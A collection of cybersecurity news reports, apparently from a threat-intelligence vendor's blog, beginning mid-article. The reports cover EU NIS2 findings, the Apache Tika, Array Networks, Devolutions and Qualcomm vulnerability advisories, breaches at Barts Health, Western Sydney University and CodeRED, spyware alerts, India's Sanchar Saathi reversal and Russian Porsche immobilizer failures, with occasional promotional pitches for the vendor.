While NIS2 is prompting organizations to raise their cybersecurity baseline, the directive implementation poses challenges across multiple domains. Entities reported obstacles in patching (50%), business continuity (49%), and supply-chain risk management (37%). Larger organizations struggle with harmonizing approaches and transitioning from legacy systems, while SMEs face barriers such as limited guidance, high tooling costs, and insufficient skills.  The report reveals ongoing difficulty in timely patching and conducting security assessments. Nearly one in three organizations had not performed a cybersecurity assessment in the previous 12 months. Additionally, 28% require more than three months to patch critical vulnerabilities, a pressing issue given that vulnerability exploitation remains a leading attack vector. SMEs face the steepest hurdles, with 63% struggling with testing and 51% with patching. 

Supply-Chain Exposure Rising 

As supply-chain risk management slowly improves, dependence on outsourced ICT and security services continues to introduce vulnerabilities, especially when suppliers are SMEs with limited resources. Supply-chain and third-party compromises were identified as the second most concerning future threat (47%), aligning with trends in the ENISA Threat Landscape report, which notes a rise in attacks targeting cyber dependencies.  Organizations cited DoS attacks as the most disruptive to daily operations, yet ransomware (55%), supply-chain attacks (47%), and phishing (35%) dominate long-term concerns. SMEs consistently reported the lowest confidence in their ability to prepare for, withstand, and recover from cyber incidents across any threat category.  Findings from the NIS Investments report feed into several ENISA initiatives, including the NIS360 assessment of sectoral maturity, the EU Cybersecurity Index, and the State of Cybersecurity in the Union report. These insights help refine policy recommendations and guide future actions to strengthen the EU’s overall cyber resilience. 

A security issue disclosed in the Apache Tika document-processing framework has proved broader and more serious than first believed. The project’s maintainers have issued a new advisory revealing that a flaw previously thought to be limited to a single PDF-processing component extends across several Tika modules, widening the scope of a vulnerability first publicized in mid-2025. 

Initial Disclosure and the Limits of CVE-2025-54988 

The original flaw, listed as CVE-2025-54988 and published in August with a severity rating of 8.4, was traced to the tika-parser-pdf-module used to process PDFs in Apache Tika from versions 1.13 through 3.2.1. Tika, a tool designed to extract and standardize content from more than 1,000 proprietary file formats, has long been a target for attacks involving XML External Entity (XXE) injection, a recurring risk in software that parses complex document formats.  According to the original CVE description, the weakness allowed attackers to hide XML Forms Architecture (XFA) instructions inside a malicious PDF. When processed, these instructions could enable an XXE injection attack, potentially letting an attacker “read sensitive data or trigger malicious requests to internal resources or third-party servers.” The vulnerability also created a pathway for data exfiltration through Tika’s own processing pipeline, with no outward indication that data was leaking. 

New CVE Expands Affected Components and Severity 

Project maintainers now report that the PDF parser was not the only vulnerable entry point. A new advisory issued on 4 December 2025 by Tim Allison on the Tika mailing list confirms that the issue affects additional components. The newly disclosed CVE-2025-66516, rated at a maximum severity of 10.0, expands the scope to include: 

• Apache Tika core (tika-core) versions 1.13 through 3.2.1 
• Apache Tika parsers (tika-parsers) versions 1.13 through 1.28.5 
• Apache Tika PDF parser module (tika-parser-pdf-module) versions 2.0.0 through 3.2.1 

The maintainers note two reasons for issuing a second CVE. First, although the vulnerability was detected via the PDF parser, the underlying flaw and its fix were located in tika-core. This means that users who updated only the PDF parser after the initial disclosure but did not update Tika core to version 3.2.2 or later remain exposed. Second, earlier Tika versions housed the PDFParser class within the tika-parsers module, which was not included in the initial CVE despite being vulnerable. The advisory states that CVE-2025-66516 “covers the same vulnerability as in CVE-2025-54988,” but widens the list of affected packages to ensure users understand the full extent of the risk. 

Impact, Exploitation Risk, and Recommended Mitigation 

As of early December, maintainers say they have no evidence that attackers are exploiting the weakness in real-world campaigns. Still, the potential for rapid exploitation remains high, particularly if proofs-of-concept or reverse-engineered attack samples begin circulating.  To eliminate the vulnerability, users are instructed to update to: 

• tika-core 3.2.2 
• tika-parser-pdf-module 3.2.2 
• tika-parsers 2.0.0 (for legacy users) 

The maintainers warn that patching may be insufficient in environments where Apache Tika is used indirectly or embedded within other applications. Its presence is not always clearly documented, creating blind spots for developers. The advisory notes that disabling XML parsing via tika-config.xml is the only mitigation for teams uncertain about where Tika may be running. 

Barts Health NHS Trust has confirmed that the data breach at Barts Health was carried out by the Russian-speaking Cl0p ransomware group, which exploited a vulnerability in Oracle E-Business Suite. The Barts Health data breach involved the theft of files from one of the trust’s invoice databases, exposing information linked to payments for treatment and other services, some dating back several years.  In its official notification, the trust stated, “As a result of a recent incident involving data from our trust, we are informing those potentially affected that there is a risk some personal data is compromised.”  The trust confirmed that the criminal group stole files containing names and addresses of individuals required to pay for treatment or services at a Barts Health hospital. These files were later posted on the dark web. Barts Health emphasized that it is pursuing legal remedies, noting, “We are taking urgent action and seeking a High Court order to ban the publication, use or sharing of this data by anyone.” 

Details of the Barts Health Data Breach and Exposed Information 

The cyberattack on Barts Health occurred after Cl0p exploited a flaw in Oracle E-Business Suite, a widely used system for automating business processes. Oracle has since corrected the vulnerability, which has affected multiple organizations globally.  The trust has reported the Barts Health data breach to NHS England, the National Cyber Security Centre, the Metropolitan Police, and the Information Commissioner’s Office. Despite the intrusion, Barts Health stressed that core healthcare systems remain secure: “Please note our electronic patient record and clinical systems are not affected, and we are confident our core IT infrastructure is secure.”  Paying patients are encouraged to review their treatment invoices to understand which details may have been exposed. Some former employees also appear in the files due to outstanding salary sacrifice amounts or overpayments. Nearly half of the compromised records relate to suppliers whose information is already publicly accessible.  The affected database also contains accounting files that Barts Health has managed since April 2024 for Barking, Havering, and Redbridge University Hospitals NHS Trust. Both trusts are coordinating efforts to limit the impact. 

Timeline of the Breach and Potential Risks to Individuals 

Although the theft occurred in August, Barts Health did not receive any indication that data had been compromised until November, when the files were uploaded to the dark web. None of the information has emerged on the open internet, restricting exposure to individuals with access to encrypted and compressed files on the dark web.  The trust warned that the stolen files cannot grant direct access to personal accounts but may help criminals craft scams to trick victims into sharing sensitive information or making payments. Individuals with concerns are advised to contact the trust’s data protection officer or consult national guidance such as “Stop! Think Fraud – How to stay safe from scams.”  Barts Health apologized for the incident, stating, “We are very sorry that this has happened and are taking steps with our suppliers to ensure that it could not happen again.”  The Cl0p ransomware group is a well-known cybercriminal syndicate recognized for its multilayer extortion operations, including encryption-less ransomware tactics. Responsible for extorting more than $500 million in ransom payments worldwide, Cl0p became prominent in 2019 through extensive phishing campaigns and malware. The group frequently exploits zero-day vulnerabilities, enabling high-impact attacks and ransom demands. 

Google and Apple have released new global cyber threat notifications, alerting users across dozens of countries to potential targeting by state-linked hackers. The latest warnings reflect growing concerns about government-backed surveillance operations and the expanding commercial spyware marketplace.  Both companies confirmed that the alerts were sent this week as part of their ongoing efforts to protect users from digital espionage. The warnings are tied to commercial surveillance firms, including Intellexa, which has been repeatedly linked to high-end spyware deployments around the globe. 

Apple Sends Warning Across More than 80 Countries 

Apple stated that its newest set of threat notifications was dispatched on December 2, though the company declined to identify the number of affected users or the specific actors involved. These warnings are triggered when technical evidence indicates that individuals are being deliberately targeted by advanced hacking techniques believed to be connected to state agencies or their contractors.  While Apple did not specify locations for this week’s alerts, it confirmed that, since the initiative began, users in more than 150 countries have received similar warnings. This aligns with the company’s broader strategy of alerting customers when activity consistent with state-directed surveillance operations is detected. 

Google Reports Intellexa Spyware Targeting Several Hundred Accounts 

Google also announced that it had notified “several hundred accounts” identified as being targeted by spyware developed by Intellexa, a surveillance vendor sanctioned by the United States. According to Google’s threat intelligence team, the attempted compromises spanned a wide geographic range. Users in Pakistan, Kazakhstan, Angola, Egypt, Uzbekistan, Saudi Arabia, and Tajikistan were among those affected. 

Also read: Sanctioned Spyware Vendor Used iOS Zero-Day Exploit Chain Against Egyptian Targets

The tech giant stated that Intellexa has continued to operate and adapt its tools despite U.S. sanctions. Executives associated with the company did not respond to inquiries about the allegations. Google also noted that this round of alerts covered people in more than 80 countries, stressing the nature of the attempted intrusions by state-linked hackers.

Rising Scrutiny of Commercial Spyware 

The latest notifications from Google and Apple are part of a bigger concern surrounding the global spyware industry. Both companies have repeatedly warned that commercial surveillance tools, particularly those sold to government clients, are becoming increasingly common in targeting journalists, activists, political figures, and other high-risk individuals.  Previous disclosures from Apple and Google have already prompted official scrutiny. The European Union has launched investigations in past cases, especially after reports that senior EU officials were targeted with similar spyware technologies. These inquiries often expand into broader examinations of cross-border surveillance practices and the companies that supply such tools. 

Also read: Leaked Files Expose Intellexa’s Remote Access to Customer Systems and Live Surveillance Ops

Tech Firms Decline to Name Specific Attackers 

Despite the breadth of the new alerts, neither Google nor Apple offered details about the identities of the actors behind the latest attempts. Apple also declined to describe the nature of the malicious activity detected. Both companies stress that withholding technical specifics is common when dealing with state-linked hackers, as revealing investigative methods could interfere with ongoing monitoring operations.  Although the exact attackers remain unnamed, the alerts demonstrate a global distribution of spyware activity. Google’s identification of affected users across multiple continents, along with Apple’s acknowledgment of notifications issued in over 150 countries over time, shows that the threat posed by government-aligned surveillance groups continues to expand. 

The Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) has confirmed that a command injection vulnerability affecting Array Networks AG Series secure access gateways has been actively exploited in Japan since August 2025. The advisory, updated on December 5, 2025, states that attackers have leveraged the flaw to implant web shells and gain unauthorized access to internal networks.  According to JPCERT, the vulnerability originates in the DesktopDirect feature of the AG Series, Array Networks’ remote desktop access capability designed to help users connect securely to office resources. Although the issue was quietly resolved by the vendor on May 11, 2025, the lack of a public CVE identifier and the continued presence of unpatched devices have left a notable attack surface exposed.  “Exploitation of this vulnerability could allow attackers to execute arbitrary commands,” the advisory states. JPCERT added that systems running DesktopDirect are specifically at risk, emphasizing that the feature enablement is a prerequisite for successful exploitation. 

Ongoing Attacks Traced to a Single IP Address 

JPCERT reports that organizations in Japan have experienced intrusions tied to this security gap beginning in August 2025. In these incidents, attackers attempted to plant PHP-based web shells in paths containing “/webapp/,” a technique that would provide persistent remote access.   The agency noted that malicious traffic has consistently originated from the IP address 194.233.100[.]138, though the identity and motivations of the threat actors remain unclear. Details regarding the scope of the campaign, the tools deployed beyond web shells, or whether the attackers represent a known threat group have not yet been released. 

No Evidence Linking to Past Exploits of CVE-2023-28461 

The newly exposed vulnerability exists alongside another previously exploited flaw in the same product line, CVE-2023-28461, a high-severity authentication bypass rated CVSS 9.8. That earlier issue was abused in 2024 by a China-linked espionage group known as MirrorFace, which has targeted Japanese institutions since at least 2019.  Despite the overlap in affected systems, JPCERT emphasized that there is no current evidence connecting the recent command injection attacks with MirrorFace or with prior activity related to CVE-2023-28461. 

Affected Versions and Required Updates 

The vulnerability impacts ArrayOS AG 9.4.5.8 and earlier versions, all of which support the DesktopDirect functionality. Array Networks issued a fixed release, ArrayOS 9.4.5.9, to address the flaw. The company has advised users to test and deploy the updated firmware as soon as possible.  JPCERT cautioned administrators that rebooting devices after applying the patch may lead to log loss. Because log files are crucial to intrusion investigations, the agency recommends preserving these records before performing any update or system reboot. 

Workarounds 

For organizations unable to immediately apply the firmware update, Array Networks has provided temporary mitigation steps: 

• Disable all DesktopDirect services if the feature is not actively in use. 

• Implement URL filtering to block requests containing semicolons (“;”), a common vector used for command injection payloads. 

These measures aim to reduce exposure until patching becomes feasible.  In its advisory, JPCERT urged all users of affected products to examine their systems for signs of compromise. Reported malicious activity includes the installation of web shells, the creation of unauthorized user accounts, and subsequent internal intrusions launched through the compromised AG gateways.

A former student has been charged over an extended series of security breaches linked to the Western Sydney University cyberattack that has affected the institution since 2021. According to police, the university endured repeated unauthorized access, data exfiltration, system compromises, and the misuse of its infrastructure, activities that also involved threats to release student information on the dark web. Authorities estimate that hundreds of staff and students have been impacted over the course of the breaches.  Detectives worked with Western Sydney University, the AFP’s Joint Policing Cyber Coordination Centre (JCP3), and external cybersecurity specialists to trace the intrusions. Their investigation led to a 27-year-old woman, a former student of the university, who was first arrested and charged in June.

The Complex Case of the Western Sydney University Cyberattack 

Despite the earlier arrest, police allege the student continued offending, sending more than 100,000 fraudulent emails to students to damage the university’s reputation and cause distress. As part of the continuing inquiry into the cyberattack on Western Sydney University, detectives executed a search warrant in North Kellyville, where the student was again arrested. Officers stated that she possessed a mobile phone modified to function as a computer terminal, allegedly used in cyber offences.  She was taken to The Hills Police Station and charged with multiple offences, including two counts of unauthorized function with intent to commit a serious offence, two counts of fabricating false evidence with intent to mislead a judicial tribunal, and breach of bail. Police say she also posted fabricated material online that was designed to exonerate herself during the ongoing legal proceedings. Bail was refused, and she was due to appear in court the following day. 

University Issues Public Notification After Continued Cyber Incidents 

Western Sydney University released a public notification on 23 October 2025, advising the community of personal information that may have been compromised in the broader Western Sydney University cyberattack pattern. The notice included a statement expressing regret over the situation:  “I want to again apologize for the impact this is having and give you my assurance that we are doing everything we can to rectify this issue and support our community.”  The university confirmed that it had been working closely with the NSW Police Force Cybercrime Squad’s Strike Force Docker, which had arrested and charged the former student on 25 June 2025. However, attempts to breach university systems continued even after the arrest, including attempts that exploited external IT service providers.  Unusual activity was detected twice, on 6 August and 11 August 2025, within the Student Management System, which is hosted by a third-party provider on a cloud platform. An immediate investigation led the university to shut down access to the platform. It was later confirmed that unauthorized access occurred through external systems linked to the platform between 19 June and 3 September 2025. These linked systems allow intruders to extract personal data from the Student Management System.  University investigators also determined that fraudulent emails sent on 6 October 2025 had used data stolen during this period. Authorities asked the university to delay notifying the community to avoid disrupting the police investigation. With approval finally granted, the university issued a comprehensive notice to students, former students, staff, offer recipients, The College, The International College, and Early Learning Ltd personnel. 

Scope of Compromised Information 

According to the public notification, the cyber incidents may have exposed a wide range of personal information, including contact details, names, dates of birth, identification numbers, nationality information, employment and payroll records, bank and tax details, driver's license and passport information, visa documentation, complaint files, and certain health, disability, and legal information.  Individual notifications are being issued to those affected, including updated findings from earlier incidents.  The notification advised individuals to change passwords, preferably to those of at least 15 characters, and implement multi-factor authentication across online accounts. Additional support services include a dedicated cyber incident website, a university phone line for inquiries, resources from the NSW Information and Privacy Commission, and reporting options via the Australian Cyber Security Centre for anyone who believes their information has been misused. 

India has reversed its earlier directive requiring mobile phone manufacturers and importers to pre-install the government-backed Sanchar Saathi application on all new smartphones sold in the country. The Communications Ministry announced on Wednesday that the government had “decided not to make the pre-installation mandatory for mobile manufacturers,” marking a notable shift just 48 hours after the original order was issued.  The initial directive, communicated privately to major firms including Apple, Samsung, and Xiaomi on November 28, required that all new devices sold in India be equipped with Sanchar Saathi within 90 days. The ministry said the earlier mandate was aimed at preventing the purchase of counterfeit devices and supporting efforts to “curb misuse of telecom resources for cyber fraud and ensure telecom cybersecurity.” 

Sanchar Saathi and India’s Cybersecurity Push Sparks Political Backlash 

Manufacturers and importers had originally been told to push the app to smartphones already circulating in distribution channels through software updates. However, the requirement immediately generated controversy. Opposition parties argued that the move had serious privacy implications, accusing the government of “watching over every movement, interaction, and decision of each citizen.” Privacy concerns escalated after activists and digital rights groups likened the situation to an order in Russia requiring all smartphones to install the state-backed Max app, which critics described as a mass surveillance tool.  While the government initially claimed that Sanchar Saathi was optional and removable, the confidential instruction given to companies stated the opposite, leading to further criticism. Several technology companies, including Apple and Google, signaled privately that they would not comply, saying the requirement conflicted with internal privacy policies and raised security concerns for their operating systems. 

Government Defends Sanchar Saathi as a Cybersecurity Tool 

Despite the swift backlash, the government continued to defend the app itself. Officials emphasized that Sanchar Saathi, which enables users to block or track lost or stolen devices and report fraudulent calls, was intended to assist citizens against “bad actors.” The Communications Ministry noted that 14 million users had already downloaded the app and were collectively contributing information on roughly 2,000 fraud incidents each day. This usage, the ministry stated, demonstrated the public’s trust in the government-provided cybersecurity tool.  Communications Minister Jyotiraditya Scindia responded directly to opposition allegations, calling the fears unfounded. He insisted the app remained voluntary: “I can delete it like any other app, as every citizen has this right in a democracy. Snooping is not possible through the app, nor will it ever be.”  The matter reached parliament, where opposition MPs sharply criticized the original order. Randeep Singh Surjewala of the Indian National Congress warned that Sanchar Saathi could function as a “possible kill switch” capable of turning “every cell phone into a brick,” suggesting it could be misused against journalists, dissidents, or political opponents. 

India Reverses Course as Public and Industry Push Back 

Following the growing national outcry, the Department of Telecommunications formally revoked the mandate. Civil society groups welcomed the reversal, though some urged caution. The Internet Freedom Foundation said the decision should be viewed as “cautious optimism, not closure,” until a formal legal direction is issued and independently verified.  While India continues to expand its digital public infrastructure and its cybersecurity initiatives, the short-lived mandate illustrates the ongoing tensions between national security measures and privacy concerns. With the withdrawal of the order, the government reaffirmed that adopting Sanchar Saathi will remain a user choice rather than a compulsory requirement for all smartphone owners in India. 

Hundreds of Porsche vehicles across Russia have abruptly stopped functioning, triggering concern over potential security flaws in modern connected-car technology. Reports circulating inside the country, by numerous frustrated posts on social media, describe Porsche models that suddenly refuse to start, leaving owners stranded and searching for answers.  

Vehicle Tracking System at the Center of the Failure 

According to The Moscow Times, the failures appear linked to the Vehicle Tracking System, or VTS, an onboard security module found in many Porsche models. The VTS functions as an anti-theft mechanism similar to General Motors’ OnStar, varying slightly depending on a vehicle’s model year.   Typically, the system incorporates satellite-based tracking and an immobilizer tied to a card or mobile device belonging to the owner. Though the manufacturer promotes the module as “an additional layer of security and peace of mind,” Russian owners now face expensive cars that, for the moment, act more like immobilized ornaments.  The issue reportedly began when dealerships across Russia were overwhelmed by service requests. Owners complained that their vehicles simply would not start, and that the cars appeared to have lost connection to the security network that supports the Vehicle Tracking System.   A representative from Rolf, the country’s largest dealer network, told RBC News that the disruption affected all Porsche models and engine types. According to the representative, any vehicle equipped with the VTS could automatically lock itself as a result of the ongoing outage.  Owners’ groups have been attempting to diagnose the sudden failures. The Russian Porsche Macan Club reported that some drivers managed to restore functionality by disabling or rebooting the Vehicle Tracking System, while others claimed success only after disconnecting their car batteries for up to 10 hours. These accounts were shared via the Telegram channel Mash. Rolf confirmed that specialists are still investigating the root cause. Meanwhile, Porsche’s office in Russia and its global headquarters in Germany have not yet released official statements addressing the system failure. 

Porsche’s Limited Presence in Russia Complicates Response 

Although Porsche halted deliveries and suspended commercial operations in Russia following the full-scale invasion of Ukraine in February 2022, the company continues to own three subsidiaries in the country. These entities have remained unsold despite efforts to divest them. Porsche’s Russian arm, Porsche Rusland LLC, has acknowledged the reports and confirmed that an investigation is underway. The company has not ruled out a cyberattack, stating that further information will be provided by Porsche and the Volkswagen Group when available.  Throughout recent days, Russian Porsche owners have continued detailing incidents in which their vehicles refuse to start. Local news outlets reported growing numbers of cases involving cars manufactured in 2013 or later. The satellite-based Vehicle Tracking System remains the primary suspect behind the sudden failures. 

Broader Concerns About Connected-Car Security 

While ignition issues are the most common complaint, some owners have described vehicles shutting down moments after being started, batteries draining rapidly, malfunctioning alarm systems, or doors locking automatically.   Early speculation focused on a faulty software update or a glitch in the immobilizer, but others have suggested the possibility of malicious interference.  A small number of owners have managed temporary fixes by removing or bypassing the immobilizer units or disconnecting their car batteries for several hours. However, the situation raises concerns about the vulnerability of increasingly connected vehicles. 

The European Union and Singapore are intensifying their digital collaboration, following the second meeting of the Digital Partnership Council in Brussels. The discussions stressed strategic priorities across critical technology sectors, including artificial intelligence (AI), cybersecurity, semiconductors, and digital trade.   The Digital Partnership Council was co-chaired by Henna Virkkunen, Executive Vice-President of the European Commission for Tech Sovereignty, Security and Democracy, and Josephine Teo, Singapore’s Minister for Digital Development and Information. Since the European Union and Singapore partnership was launched in February 2023, the council has monitored progress and adjusted its focus to reflect current technological and market developments. 

European Union and Singapore on AI and Digital Safety 

AI remained a central topic, with both the European Union and Singapore reaffirming the importance of existing frameworks that ensure the safe development and deployment of AI technologies. Future cooperation was discussed in areas such as language AI models, linking the EU’s Alliance for Language Technologies European Digital Infrastructure Consortium (ALT-EDIC) with Singapore’s Sea-Lion model.   Online safety and scam prevention were also highlighted as growing priorities. Both parties expressed a commitment to protecting vulnerable groups, particularly minors, by exploring tools such as age-verification mechanisms and digital protection that enhance user trust online. 

Digital Trust and Identity 

Strengthening digital trust remains a key goal under the EU–Singapore Digital Partnership. The council explored the development of interoperable trust services and verifiable credentials that could enable secure cross-border digital identity use cases. This approach aims to simplify regulatory compliance and facilitate smoother digital transactions across sectors, supporting both public and private initiatives.  Cybersecurity remains a cornerstone of the Digital Partnership Council’s agenda. Both the European Union and Singapore emphasized the importance of assessing new cyber threats and reinforcing resilience through coordinated bilateral and multilateral actions. The ongoing focus reflects recognition of cybersecurity’s vital role in sustaining market confidence and protecting digital infrastructure. 

Data, Semiconductors, and New Technologies 

The council also reviewed strategies to enhance cross-border data flows and explored potential collaboration in shared data spaces. Both parties expressed interest in research partnerships in semiconductors and quantum technologies, recognizing the value of cross-border investments and scientific collaboration under frameworks such as Horizon Research. These initiatives aim to strengthen innovation capabilities and ensure long-term technological competitiveness.  The EU and Singapore reaffirmed their goal for digital trade, building on the Digital Trade Agreement signed in May 2025. This agreement sets binding rules that enhance legal certainty, protect consumers, and remove unnecessary barriers to digital commerce. Through this framework, the Digital Partnership Council seeks to foster economic security and innovation while reinforcing international digital standards. 

A Strategic Framework for Future Cooperation 

Since its inception in 2023, the EU–Singapore Digital Partnership has aimed to empower businesses and citizens to fully leverage technological opportunities. The partnership has focused on bridging the digital divide, promoting trusted data flows, developing digital identities, and fostering skills and research excellence.   By continuing to align strategies and advance joint projects, the European Union and Singapore are setting a model for international digital cooperation, ensuring that both economies remain competitive and secure in the technology-driven world. 

A nationwide cybersecurity incident involving the OnSolve CodeRED mass notification network has placed Monroe County, Georgia residents at risk, prompting local officials to warn the public and begin transitioning to a new emergency alert system. The Monroe County cyberattack, which officials emphasize did not originate locally, has compromised personal information belonging to users enrolled in the county’s emergency alert service.  In its formal notification, Monroe County Emergency Management Agency (EMA) informed residents that a nationwide data breach affecting all OnSolve CodeRED customers had been confirmed. The county stated, “This has been an issue nationwide,” stressing that the breach stemmed from an attack on the vendor system rather than any action by Monroe County personnel. According to the county, the incident was attributed to “an organized cybercriminal group that has victimized our platform and our customers.” 

Compromised Monroe County’s User Data

The cyberattack on Monroe County users occurred within the broader CodeRED environment, which supports emergency alerts issued across the United States. Once the breach was discovered, OnSolve immediately discontinued its CodeRED service nationwide and shifted resources to a new platform known as Crisis24 CodeRED. Officials said the intrusion was contained within the original system and did not spread to other networks.  According to OnSolve’s assessment, the compromised data includes names, addresses, email addresses, phone numbers, and passwords associated with CodeRED user accounts. County officials urged residents who use the same password for multiple accounts to change those passwords immediately to reduce the risk of further exposure.  Enrollment timing also affects the extent of data loss. Monroe County explained that residents who signed up for CodeRED before March 31, 2025, will have their information migrated to the new Crisis24 CodeRED platform. However, all data added after March 31, 2025, was lost during the incident, meaning those users will need to re-enroll once the new system becomes fully operational. The county noted that it is working closely with Crisis24 staff to expedite the setup of the replacement alert service. 

Vendor Response, FAQ Details, and System Transition 

Although the breach occurred entirely within a third-party vendor system, Monroe County EMA acknowledged that the incident is likely to cause worry within the community. Officials pledged ongoing communication, stating they will share any additional updates provided by OnSolve.  OnSolve also released a detailed FAQ explaining the breach. The vendor reported that personal contact information “may be published” as a result of the attack, but said forensic analysis indicates no impact on municipal systems beyond emergency alerts. According to the provider, the newly launched Crisis24 CodeRED platform resides in a separate, non-compromised environment and has undergone a comprehensive security audit, including external penetration testing and system hardening.  The company stated that the cybersecurity incident was detected in November and that it acted quickly to secure the affected systems, launch an investigation, and engage outside experts. The original OnSolve CodeRED platform has since been permanently decommissioned. 

No Evidence of Identity Theft, but Rising Cyber Risks Cited 

Despite concerns surrounding the Monroe County cyberattack, officials report no evidence that the compromised data has been used for identity theft or fraud. They noted that the breach reflects a broader rise in cyber intrusions nationwide, highlighting the need for stronger threat monitoring and rapid detection.   As the county works to restore its emergency alert system, officials reiterated their commitment to transparency and continued oversight. The growing frequency of attacks also stresses why organizations increasingly rely on independent threat-intelligence providers such as Cyble, whose research regularly tracks new vulnerabilities and cybercriminal activity across global networks.  To better understand how organizations can strengthen their defenses against incidents like the Monroe County cyberattack, security teams can request a guided demonstration of Cyble’s AI-native threat-intelligence capabilities. A personalized demo provides a practical look at how Cyble identifies exposures, tracks threat actors, and supports faster response decisions. 

A batch of new vulnerabilities in Devolutions Server targets organizations that depend on the platform to manage privileged accounts, passwords, and sensitive authentication data.   Devolutions has released a security advisory, identified as DEVO-2025-0018, warning customers of multiple vulnerabilities, including a critical flaw that could enable attackers to extract confidential data directly from the system’s database.  The advisory notes several versions of the Devolutions Server, specifically 2025.2.20 and earlier, and 2025.3.8 and earlier, are affected. 

Critical SQL Injection Vulnerability Enables Data Exfiltration 

The most severe issue, scored 9.4 (Critical) under the CVSS 4.0 rating system, involves an SQL injection weakness in the platform’s “last usage logs.” The flaw occurs when the system attempts to sort usage history through a parameter known as DateSortField. Because the software does not sufficiently validate user-supplied input in this field, an authenticated user can inject malicious SQL commands directly into the database.  This vulnerability, tracked as CVE-2025-13757, allows a logged-in attacker to exfiltrate or modify sensitive information, posing a significant threat to environments where Devolutions Server stores high-value credentials, access keys, and privileged account data. The flaw can reveal information that should remain inaccessible, making it one of the most dangerous issues ever reported for the platform.  Credit for discovering the vulnerability was attributed to JaGoTu of DCIT a.s. 

Two Medium-Severity Vulnerabilities Also Discovered 

Alongside CVE-2025-13757, the same research group identified two additional security weaknesses, CVE-2025-13758 and CVE-2025-13765, both classified as medium severity, though still impactful in environments requiring strict confidentiality. 

CVE-2025-13758: Credentials Leaked in Partial Entry Requests 

One issue involves certain entry types improperly including passwords in the initial request for general item information. Normally, credentials such as passwords are delivered only through a protected /sensitive-data request when a user intentionally accesses them. However, some entries exposed credential data prematurely, increasing the risk of unauthorized disclosure. This vulnerability carries a 5.1 CVSS score and also affects the same product versions listed in the advisory. 

CVE-2025-13765: Improper Access Control in Email Service Configuration 

The second Medium-risk flaw, rated 4.9 CVSS, involves improper access controls within the platform’s email service configuration API. When multiple email services were set up, users lacking administrative privileges could still retrieve email service passwords, undermining the system’s access control model.  Both issues were likewise credited to JaGoTu, DCIT a.s. 

Required Updates and Remediation 

Devolutions recommends immediate installation of the patched releases to remediate all three vulnerabilities. The advisory instructs customers to upgrade Devolutions Server to: 

• Version 2025.2.21 or higher 
• Version 2025.3.9 or higher 

Applying these updates is essential to block SQL injection attempts, prevent unauthorized credential exposure, and restore proper access control protections. Without these patches, organizations remain susceptible to data exfiltration, unauthorized password retrieval, and improper user privilege escalation.  The identification of CVE-2025-13757, CVE-2025-13758, and CVE-2025-13765 confirms the need for immediate patching across all affected Devolutions Server deployments. Because these flaws expose sensitive credentials and privileged access pathways, unpatched systems face measurable confidentiality and operational risks.   Organizations should apply the recommended updates without delay and strengthen their ongoing vulnerability oversight. Platforms such as Cyble, which provide real-time vulnerability intelligence and clearer prioritization of high-impact risks, can support security teams in identifying issues like these earlier and reducing exposure across their environments.  See your vulnerabilities before attackers do. Book a personalized demo with Cyble today and gain real-time visibility into critical risks, zero-days, and high-impact threats across your enterprise. 

Qualcomm warned partners and device manufacturers about multiple newly discovered vulnerabilities that span its chipset ecosystem. The Qualcomm released a detailed security bulletin on December 1, 2025, outlining six high-priority weaknesses in its proprietary software, including one flaw that directly compromises the secure boot process, one of the most sensitive stages in a device’s startup chain.  The bulletin states that the document aims to help customers integrate required fixes into both existing and upcoming devices. Qualcomm advised device makers to contact the security bulletins for questions, while also acknowledging external researchers who assisted in identifying several of the issues.   Contributors included Niek Timmers and Cristofaro Mune of Raelize, conghuiwang, Haonan Li, Zinuo Han of OPPO Amber Security Lab, and a researcher identified as ylva. 

A Secure Boot Vulnerability: CVE-2025-47372 

The most severe issue detailed in the security alert is CVE-2025-47372, a flaw that threatens the integrity of the secure boot process. Qualcomm rated the vulnerability as Critical on both its internal scale and the Common Vulnerability Scoring System (CVSS).  The company’s analysis revealed that the flaw involves a buffer copy operation during boot that fails to validate the size of an incoming ELF image properly. If the image is corrupted or intentionally oversized, the bootloader may write out of bounds, creating memory corruption at an early and highly trusted stage in the startup sequence.  Classified under CWE-120 (Classic Buffer Overflow) and carrying a CVSS score of 9.0, the vulnerability could allow attackers to bypass essential verification routines, install persistent malicious firmware, or seize control of a device before the primary operating system loads. Qualcomm noted that the defect was identified internally, but the company did not clarify how long it may have existed in production hardware prior to detection. A broad range of Snapdragon, QAM, and QCA boot-capable platforms are affected. 

Additional High-Impact Vulnerabilities 

Beyond CVE-2025-47372, Qualcomm’s security bulletin lists five additional high-priority threats and several moderate-severity issues. 

• CVE-2025-47319, also internally discovered, impacts the High-Level Operating System (HLOS). Though Qualcomm assigned it a Critical internal rating, its standardized CVSS score is Medium (6.7). The flaw stems from the unintended exposure of Trusted Application–to–Trusted Application (TA-to-TA) communication interfaces to the HLOS layer, matching CWE-497. Affected platforms include FastConnect modules, Snapdragon 4/6/8 Gen chipsets, QAM/QCA families, automotive systems, AR devices, and various compute modules. 
• CVE-2025-47323, a High-severity vulnerability with a 7.8 CVSS score, involves integer overflow during audio packet routing. Incorrect handling of GPR packets can trigger wraparound conditions, leading to memory corruption. This flaw spans a wide set of platforms, including AR/VR devices, FastConnect modules, Snapdragon compute processors, and numerous modem-RF systems. 
• CVE-2025-47325, reported on September 3, 2025, is a TrustZone firmware vulnerability involving untrusted pointer dereferencing. With a CVSS score of 6.5, the issue could permit unauthorized access to protected memory regions. The bulletin indicates that many IPQ, QCA, QCN, and SDX networking chipsets are affected. 
• CVE-2025-47350, another High-severity issue, affects DSP Services. The vulnerability arises from improper handling of concurrent memory mapping and unmapping operations, classified as CWE-416 (Use-After-Free). While potentially severe, Qualcomm noted that no currently active products are impacted, suggesting the flaw exists only in development lines or inactive code. 
• CVE-2025-47387, a High-severity camera subsystem vulnerability (CVSS 7.8), involves untrusted pointer dereferencing during JPEG IOCTL handling, presenting risks of memory corruption. Impacted hardware includes multiple compute platforms, FastConnect chipsets, Snapdragon 7c/8c/8cx processors, and several mobile SoCs. 

Core Services and Open-Source Vulnerabilities 

A moderate-severity issue, CVE-2025-47321, affects Core Services. This classic buffer overflow (CWE-120) can occur when copying packets from Unix clients without enforcing proper bounds checks, posing risks of privilege escalation or remote code execution. The flaw impacts a wide range of Qualcomm connectivity, audio, mobile, AR, wearable, and compute chipsets.  The security bulletin also details multiple open-source software vulnerabilities coordinated through CodeLinaro. These include: 

• CVE-2025-27063: A Use-After-Free issue in video playback. 
• CVE-2025-47320: An out-of-bounds audio write was also patched via CodeLinaro. 
